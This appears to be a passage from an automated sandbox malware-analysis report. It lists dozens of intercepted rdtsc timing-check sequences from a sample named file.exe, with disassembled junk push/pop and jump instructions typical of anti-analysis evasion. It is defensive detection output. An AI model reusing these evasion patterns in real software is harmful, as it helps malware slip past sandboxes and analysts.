    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE189C second address: AE18C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100BF03F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F5100BF03E6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE18C0 second address: AE18C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE18C4 second address: AE18C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE19FD second address: AE1A13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5100C93C0Ah 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE1A13 second address: AE1A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE1B75 second address: AE1B7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE1B7B second address: AE1B81 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE1CBB second address: AE1CEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100C93C15h 0x00000007 jmp 00007F5100C93C13h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE1CEE second address: AE1D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5100BF03E6h 0x0000000a jmp 00007F5100BF03EFh 0x0000000f popad 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE1D08 second address: AE1D12 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5100C93C12h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE1E41 second address: AE1E46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8AAF9 second address: A8AAFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8AAFD second address: A8AB01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE1FA4 second address: AE1FAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE1FAB second address: AE1FB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE1FB1 second address: AE1FBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE1FBA second address: AE1FC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5100BF03E6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6CA9 second address: AE6CAF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6CAF second address: AE6CB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE706C second address: AE7070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA4FF second address: AEA534 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jnl 00007F5100BF040Ah 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA67D second address: AEA681 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA681 second address: AEA6A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5100BF03E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007F5100BF03F5h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA6A6 second address: AEA6AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA6AA second address: AEA6B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA7FE second address: AEA818 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5100C93C1Ch 0x00000008 jmp 00007F5100C93C10h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEAC5E second address: AEAC79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5100BF03F7h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF37AC second address: AF37E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5100C93C12h 0x00000009 pop ebx 0x0000000a push edi 0x0000000b jmp 00007F5100C93C11h 0x00000010 pop edi 0x00000011 pop eax 0x00000012 push eax 0x00000013 jmp 00007F5100C93C0Dh 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF37E8 second address: AF37EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF188C second address: AF18EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5100C93C06h 0x0000000a pop esi 0x0000000b jno 00007F5100C93C1Bh 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 jp 00007F5100C93C06h 0x0000001a pushad 0x0000001b popad 0x0000001c jnc 00007F5100C93C06h 0x00000022 popad 0x00000023 jns 00007F5100C93C0Ch 0x00000029 ja 00007F5100C93C06h 0x0000002f pushad 0x00000030 pushad 0x00000031 popad 0x00000032 jmp 00007F5100C93C16h 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF1A31 second address: AF1A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF1A37 second address: AF1A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pushad 0x00000006 popad 0x00000007 jc 00007F5100C93C06h 0x0000000d pop edi 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF1A45 second address: AF1A71 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5100BF03F8h 0x00000008 jmp 00007F5100BF03F0h 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jc 00007F5100BF03EEh 0x00000019 jne 00007F5100BF03E6h 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF1BDD second address: AF1BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF1BE8 second address: AF1BED instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF2916 second address: AF291C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF291C second address: AF2920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF2920 second address: AF2926 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF2926 second address: AF293A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F5100BF03E6h 0x0000000e je 00007F5100BF03E6h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF293A second address: AF294A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F5100C93C06h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF294A second address: AF294E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF294E second address: AF295C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100C93C0Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF2C25 second address: AF2C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF3494 second address: AF349C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF349C second address: AF34E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 ja 00007F5100BF03F5h 0x0000000d jmp 00007F5100BF03EFh 0x00000012 jnc 00007F5100BF03F2h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F5100BF03F6h 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF68C5 second address: AF68D8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5100C93C08h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF6A4F second address: AF6A53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF6BB9 second address: AF6BD3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5100C93C06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5100C93C0Dh 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF6BD3 second address: AF6BF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F5100BF03F5h 0x0000000a pushad 0x0000000b popad 0x0000000c jns 00007F5100BF03E6h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF6E47 second address: AF6E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5100C93C06h 0x0000000a popad 0x0000000b pushad 0x0000000c jno 00007F5100C93C06h 0x00000012 jne 00007F5100C93C06h 0x00000018 popad 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c js 00007F5100C93C08h 0x00000022 pushad 0x00000023 popad 0x00000024 jns 00007F5100C93C0Ah 0x0000002a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF7416 second address: AF7439 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5100BF03E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F5100BF03F7h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF7439 second address: AF7454 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100C93C16h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF7454 second address: AF745C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFC1B5 second address: AFC1B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFC1B9 second address: AFC1BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFC1BF second address: AFC1C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFC1C3 second address: AFC1DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100BF03F7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFC1DE second address: AFC1FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F5100C93C13h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F5100C93C0Bh 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B04BD9 second address: B04BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5100BF03E6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B04BE3 second address: B04BEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B04BEC second address: B04BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007F5100BF03E6h 0x0000000c popad 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0317B second address: B031AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5100C93C15h 0x00000009 pop ecx 0x0000000a jnl 00007F5100C93C08h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jnc 00007F5100C93C06h 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B031AB second address: B031B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B031B0 second address: B031BC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B031BC second address: B031C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B032EA second address: B0331F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5100C93C10h 0x00000009 js 00007F5100C93C06h 0x0000000f jmp 00007F5100C93C10h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jg 00007F5100C93C06h 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0331F second address: B0332D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0332D second address: B03342 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100C93C0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B03342 second address: B03346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0362A second address: B03630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B04A73 second address: B04A77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0C478 second address: B0C48C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5100C93C0Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0C48C second address: B0C4A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100BF03F7h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B18D75 second address: B18D7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B18D7B second address: B18D81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B18D81 second address: B18D85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1B2C7 second address: B1B2EA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5100BF03E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F5100BF03F9h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1E70A second address: B1E70E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1E70E second address: B1E712 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1E712 second address: B1E718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1E3E4 second address: B1E414 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007F5100BF03E8h 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F5100BF03F8h 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1E414 second address: B1E41D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1E41D second address: B1E423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1E423 second address: B1E427 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3588C second address: B3589F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jo 00007F5100BF03E6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B347B5 second address: B347C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5100C93C0Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34AAC second address: B34AC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5100BF03F8h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34C48 second address: B34C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34C4E second address: B34C61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5100BF03EAh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34C61 second address: B34C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5100C93C14h 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34C7A second address: B34C80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34C80 second address: B34C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34C84 second address: B34C93 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5100BF03E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B355E4 second address: B355FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5100C93C06h 0x0000000a jno 00007F5100C93C06h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007F5100C93C06h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B355FF second address: B35603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B38E1B second address: B38E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3A89E second address: B3A8B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F5100BF03EEh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3A8B7 second address: B3A8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3A8BC second address: B3A8C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3A8C2 second address: B3A8C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4944B second address: B4946D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5100BF03F8h 0x00000009 jne 00007F5100BF03E6h 0x0000000f rdtsc
